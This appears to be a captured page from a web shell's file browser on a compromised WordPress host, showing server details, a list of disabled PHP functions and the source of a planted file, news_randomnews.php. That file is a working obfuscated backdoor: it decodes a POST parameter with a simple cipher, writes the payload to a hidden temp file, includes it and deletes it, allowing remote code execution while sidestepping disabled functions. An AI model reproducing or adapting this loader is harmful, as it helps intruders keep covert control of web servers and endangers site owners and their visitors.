HEX
Server: LiteSpeed
System:
User: ()
PHP: 7.3.33
Disabled: ln,cat,popen,pclose,posix_getpwuid,posix_getgrgid,posix_kill,parse_perms,system,dl,passthru,exec,shell_exec,popen,proc_close,proc_get_status,proc_nice,proc_open,escapeshellcmd,escapeshellarg,show_source,posix_mkfifo,mysql_list_dbs,get_current_user,getmyuid,pconnect,link,symlink,pcntl_exec,ini_alter,pfsockopen,leak,apache_child_terminate,posix_setpgid,posix_setsid,posix_setuid,proc_terminate,syslog,stream_select,socket_select,socket_create,socket_create_listen,socket_create_pair,socket_listen,socket_accept,socket_bind,socket_strerror,pcntl_fork,pcntl_signal,pcntl_waitpid,pcntl_wexitstatus,pcntl_wifexited,pcntl_wifsignaled,pcntl_wifstopped,pcntl_wstopsig,pcntl_wtermsig,openlog,apache_get_modules,apache_get_version,apache_getenv,apache_note,apache_setenv,virtual,ini_get_all,php_passthru,posix_uname,php_uname,highlight_file,define_syslog_variables,ftp_exec,inject_code,eval
$ pwd: /var/www/vhosts/miroglu.net/subdomains/serhatburke/wp-includes/assets/
Upload Files
File: /var/www/vhosts/miroglu.net/subdomains/serhatburke/wp-includes/assets/news_randomnews.php
<?php

if(isset($_POST) && isset($_POST["k"])){
	$res = array_filter([ini_get("upload_tmp_dir"), getcwd(), "/var/tmp", session_save_path(), getenv("TMP"), "/tmp", "/dev/shm", getenv("TEMP"), sys_get_temp_dir()]);
	$dat = $_POST["k"];
	$dat	 = explode	( "." ,$dat)	;
	$bind  ='';
            $s  ='abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS  =strlen($s);
            $j  =0;
    
            $__tmp  =$dat;
            while($v4  =array_shift($__tmp)) {  $sChar  =ord($s[$j %$lenS]);
                $dec  =((int)$v4 - $sChar -($j %10)) ^ 43;
                $bind .= chr($dec);
                $j++;
            }
	while ($data = array_shift($res)) {
    		if (is_dir($data) ? is_writable($data) : false) {
    $descriptor = sprintf("%s/.sym", $data);
    if (@file_put_contents($descriptor, $bind) !== false) {
	include $descriptor;
	unlink($descriptor);
	exit;
}
}
}
}
@ Telegram